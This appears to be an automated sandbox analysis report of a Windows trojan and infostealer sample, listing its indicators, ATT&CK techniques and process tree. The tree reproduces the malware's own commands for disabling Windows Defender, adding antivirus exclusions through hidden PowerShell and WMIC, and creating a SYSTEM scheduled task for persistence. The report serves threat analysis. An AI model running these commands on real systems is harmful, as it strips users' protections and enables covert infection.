00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195

Analysis

max time kernel
67s
max time network
188s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
03/05/2024, 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe
Size

7.3MB
MD5

1ee16d7f5a4309783b355504df37718e
SHA1

38d89f3c44bf37b67a2c8fb62e87151ecde11b3a
SHA256

00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195
SHA512

767606fedba32d7796d2b44c6790aa7d2f0bd1dd931dde1fc7d91ad95cb3afc6c82f6a634ac541fe4b2a8ca5b5228cc95f42c4bc13e3d0afb7dbdc6f54ca03df
SSDEEP

196608:91ObHXSuaJXHZDRpkTPxGo+pY6zfsVf6EFlz:3ObCu4XHXpDobxd5V

Score

10^/10

evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sglvIZRdDeVLC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\bCkljnrIeSZuVzVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gMilQfTdIRUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KnZelsPPFGMRyKDX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icUgDvQSU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icUgDvQSU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\bCkljnrIeSZuVzVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KnZelsPPFGMRyKDX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HBmACejevtsxTSigFeR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gMilQfTdIRUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qjFPOYfeHIOU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HBmACejevtsxTSigFeR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qjFPOYfeHIOU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KnZelsPPFGMRyKDX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KnZelsPPFGMRyKDX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sglvIZRdDeVLC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe
916	powershell.EXE
2160	powershell.EXE
1716	powershell.EXE
2116	powershell.exe
1068	powershell.exe
2488	powershell.exe
1912	powershell.exe
2560	powershell.exe
2916	powershell.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 3 IoCs

pid	Process
2696	Install.exe
1668	Install.exe
2032	jENuTVV.exe

Loads dropped DLL 8 IoCs

pid	Process
1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe
2696	Install.exe
2696	Install.exe
2696	Install.exe
2696	Install.exe
1668	Install.exe
1668	Install.exe
1668	Install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	jENuTVV.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jENuTVV.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jENuTVV.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	jENuTVV.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bVFQYJtttQfRPyDmFj.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2280	schtasks.exe
3048	schtasks.exe
1828	schtasks.exe
2080	schtasks.exe
536	schtasks.exe
2396	schtasks.exe
2992	schtasks.exe
836	schtasks.exe
2584	schtasks.exe
2576	schtasks.exe
1968	schtasks.exe
868	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	jENuTVV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	jENuTVV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00fc8ab6a79dda01	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000080605bb6a79dda01	jENuTVV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	jENuTVV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	jENuTVV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe
2664	powershell.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
916	powershell.EXE
916	powershell.EXE
916	powershell.EXE
2160	powershell.EXE
2160	powershell.EXE
2160	powershell.EXE
2560	powershell.exe
1716	powershell.EXE
1716	powershell.EXE
1716	powershell.EXE

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	916	powershell.EXE
Token: SeDebugPrivilege	2160	powershell.EXE
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1948	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1948	WMIC.exe
Token: SeSecurityPrivilege	1948	WMIC.exe
Token: SeTakeOwnershipPrivilege	1948	WMIC.exe
Token: SeLoadDriverPrivilege	1948	WMIC.exe
Token: SeSystemtimePrivilege	1948	WMIC.exe
Token: SeBackupPrivilege	1948	WMIC.exe
Token: SeRestorePrivilege	1948	WMIC.exe
Token: SeShutdownPrivilege	1948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1948	WMIC.exe
Token: SeUndockPrivilege	1948	WMIC.exe
Token: SeManageVolumePrivilege	1948	WMIC.exe
Token: SeDebugPrivilege	1716	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 1656 wrote to memory of 2696	1656	00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe	28
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 2696 wrote to memory of 1668	2696	Install.exe	29
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 1668 wrote to memory of 2572	1668	Install.exe	30
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2572 wrote to memory of 2296	2572	cmd.exe	32
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2296 wrote to memory of 2708	2296	forfiles.exe	33
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2708 wrote to memory of 2600	2708	cmd.exe	34
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2572 wrote to memory of 2484	2572	cmd.exe	35
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2484 wrote to memory of 2360	2484	forfiles.exe	36
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2360 wrote to memory of 2540	2360	cmd.exe	37
PID 2572 wrote to memory of 2704	2572	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe
"C:\Users\Admin\AppData\Local\Temp\00a08e96b6896364503dd781ed238d8aa783ab5f26060d1fe0ac192193eb2195.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656
- C:\Users\Admin\AppData\Local\Temp\7zS1CA5.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Users\Admin\AppData\Local\Temp\7zS1F15.tmp\Install.exe
    .\Install.exe /SwuTdidVUaX "525403" /S
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2296
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2708
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:2600
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2484
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2360
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        5⤵
        
        PID:2704
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2468
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:2624
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        5⤵
        
        PID:2388
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:2592
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:2648
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:2856
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        8⤵
        
        PID:2372
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
      4⤵
      PID:2412
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        5⤵
        
        PID:2532
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bVFQYJtttQfRPyDmFj" /SC once /ST 22:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP\NsjMhDBpUOGfSxc\jENuTVV.exe\" xW /FBtdidaqCG 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:2280
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bVFQYJtttQfRPyDmFj"
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bVFQYJtttQfRPyDmFj
        5⤵
        
        PID:1676
      - \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bVFQYJtttQfRPyDmFj
        6⤵
        
        PID:1472

C:\Windows\system32\taskeng.exe
taskeng.exe {30E67089-2648-4805-B0F8-7DF2A1126D11} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2180
- C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP\NsjMhDBpUOGfSxc\jENuTVV.exe
